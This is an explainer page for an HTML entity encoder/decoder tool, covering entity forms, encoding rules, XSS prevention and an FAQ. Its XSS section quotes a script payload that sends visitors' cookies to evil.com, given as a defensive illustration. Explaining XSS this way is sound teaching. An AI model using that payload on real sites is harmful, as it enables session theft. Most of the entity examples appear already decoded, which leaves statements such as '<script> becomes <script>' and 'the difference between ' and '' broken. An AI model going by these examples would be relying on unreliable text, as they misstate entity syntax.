HTML Entity Encoder / Decoder

Why HTML Entities Exist

HTML uses certain characters as part of its markup syntax. The angle brackets < and > delimit tags, the ampersand & introduces entity references, and quotation marks " delimit attribute values. If you need to display any of these characters as content — rather than as markup — you cannot write them literally. The browser would interpret them as HTML structure.

HTML entities solve this by providing an alternative way to represent characters using only safe ASCII characters. < displays as <, & displays as &, and © displays as ©. Entities also allow you to include characters that are difficult or impossible to type directly — mathematical symbols, arrows, currency signs, and characters from other scripts — in HTML documents using only keyboard-typeable ASCII.

Named vs Decimal vs Hexadecimal Entities

HTML entities come in three forms, all equivalent to the browser:

Named entities use a descriptive name between & and ;. Examples: © (©), — (—), € (€). Named entities are the most human-readable form and are widely supported in HTML5. The set of named entities is defined by the HTML specification — not every Unicode character has a named entity.

Decimal entities use the decimal Unicode code point: © (©), € (€). Any Unicode character can be represented as a decimal entity, even if it has no named form.

Hexadecimal entities use the hexadecimal code point with an x prefix: © (©), € (€). Preferred by developers who are comfortable with hex — the values align with standard Unicode code point notation (U+00A9, U+20AC).

When to Encode and When Not To

Always encode in HTML content: Any <, >, and & that appear in text content and are not intended as HTML markup must be encoded. Not encoding these creates malformed HTML and potential security vulnerabilities.

Always encode in HTML attributes: Any " or ' inside attribute values delimited by the same quote character must be encoded. Use " in double-quoted attributes or ' in single-quoted attributes.

Do not over-encode: Modern HTML documents should be saved as UTF-8. In UTF-8 documents, it is perfectly valid to include Unicode characters like ©, €, or em-dashes directly in the source without encoding them. Over-encoding every non-ASCII character bloats the HTML and makes the source harder to read. Only encode the five HTML-special characters when necessary.

In JSON, XML, and template engines: Similar rules apply. JSON encodes backslash and quotes. XML encodes the same set as HTML. Template engines (Jinja2, Handlebars, Blade, etc.) auto-escape HTML by default — understand when auto-escaping is active and when you need to opt into raw output. Use our JSON Formatter to inspect JSON with special characters.

HTML Entities and XSS Prevention

Cross-Site Scripting (XSS) is one of the most common web vulnerabilities. It occurs when an attacker injects malicious scripts into web pages viewed by other users. The classic vector: a website displays user-provided text without encoding it, so an attacker submits <script>document.location="https://evil.com/?c="+document.cookie</script>. If this is rendered as raw HTML, the script executes in every visitor's browser.

HTML entity encoding is the primary defense. If user input is encoded before rendering, <script> becomes <script> — which the browser displays as literal text, not as a tag. The script never executes.

Every major web framework auto-escapes by default: React, Vue, and Angular all HTML-encode dynamic content inserted via the standard templating syntax. {{variable}} in these frameworks produces encoded output. Explicitly opting into raw HTML (React's dangerouslySetInnerHTML, Vue's v-html) bypasses encoding and must be used with extreme care — only with content you control or have sanitized.

Most Common Entities for Developers

In day-to-day web development, you encounter a small set of entities repeatedly:

• & — Use instead of & in HTML attribute values and content
• < / > — Required when displaying code snippets in HTML
• " — Required in double-quoted attribute values containing quotes
•   — Non-breaking space for layout control (though CSS is usually better)
• — — Em dash for typography in prose
• © — Copyright notice in footers
• ™ — Trademark symbol in product names
• … — Ellipsis for truncated text
• → — Right arrow for navigation cues

Use our Reference tab to find the entity for any symbol. Pair with the URL Encoder when you need to embed HTML-encoded content in a URL parameter.

Frequently Asked Questions

Do I need to encode all non-ASCII characters in modern HTML?

No. With a UTF-8 charset declaration (<meta charset="UTF-8">), you can include Unicode characters like © and € directly in the source. Only encode the five HTML-special characters (< > & " ') that have structural meaning in HTML.

What is the difference between ' and '?

They represent the same character (apostrophe/single quote). ' is defined in XML and HTML5 but was not part of HTML4. ' works in all HTML versions. For maximum compatibility, use ' for apostrophes in HTML attributes.

Why does   behave differently from a regular space?

A regular space is a line-break opportunity — browsers can break a line there. A non-breaking space ( , U+00A0) prevents line breaks between the words it connects. It also does not collapse like regular whitespace in HTML. Use it for units (100 km), names that should not break, and narrow formatting. For most layout control, CSS is more appropriate.

How do I display code snippets in HTML?

Wrap code in <code> or <pre><code> tags and encode all <, >, and & characters in the code content. Many syntax highlighting libraries do this automatically. This tool's Encode tab converts a code snippet to HTML-safe form instantly.

Does JavaScript handle HTML entities automatically?

Not automatically. innerHTML and template literals do not encode HTML. React's JSX, Vue's template syntax, and Angular's interpolation all encode by default. If you set element.textContent = userInput, the browser auto-encodes. If you set element.innerHTML = userInput, it does not — a common XSS vulnerability.

What is the difference between HTML entities and URL encoding?

HTML entities make characters safe for HTML documents. URL encoding (percent encoding) makes characters safe for URLs. They are different encoding systems for different contexts. A URL inside an HTML attribute needs both: the URL must be percent-encoded, and the attribute value must be HTML-encoded. Use our URL Encoder for URL encoding.

Can I use hex entities in CSS content?

CSS uses a different escape syntax — a backslash followed by the hex code point: \" or \A9 (©). HTML hex entities (©) do not work in CSS. However, you can use the actual Unicode character directly in CSS string values with a UTF-8 encoded stylesheet.